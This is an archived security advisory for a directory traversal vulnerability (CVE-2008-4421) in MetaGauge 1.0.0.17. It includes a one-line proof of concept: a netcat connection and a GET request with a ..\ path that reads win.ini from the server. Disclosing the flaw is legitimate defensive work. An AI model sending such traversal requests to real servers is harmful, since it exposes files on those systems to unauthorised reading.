TUCoPS :: HP Unsorted M :: va1477.htm

MetaGauge 1.0.0.17 Directory Traversal
MetaGauge 1.0.0.17 Directory Traversal
MetaGauge 1.0.0.17 Directory Traversal


Title: MetaGauge 1.0.0.17 Directory Traversal=0D
=0D
-------------------------------------------------------------=0D
=0D
Vendor: Hammer Software=0D
=0D
Vendor URL: www.Hammer-Software.com=0D 
=0D
Vendor Response: Vendor has been notified and has since addressed the issue in the latest software release.=0D
=0D
Description:=0D
=0D
A directory traversal vulnerability exists in MetaGauge version 1.0.0.17 (and potentially below) which allows a remote user to view files local to the target server. =0D
=0D
Example:=0D
=0D
C:\> nc targethost 2004=0D
GET /..\..\..\..\..\..\winnt\win.ini HTTP/1.1=0D
=0D
=0D
Patch Information:=0D
=0D
Hammer has addressed the issue in the latest version of MetaGauge:=0D
=0D
http://dl.hammer-software.com/metagauge.zip=0D 
=0D
CVE:  CVE-2008-4421=0D
=0D
Credit:=0D
=0D
Brad Antoniewicz=0D
=0D
brad.antoniewicz@foundstone.com=0D

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH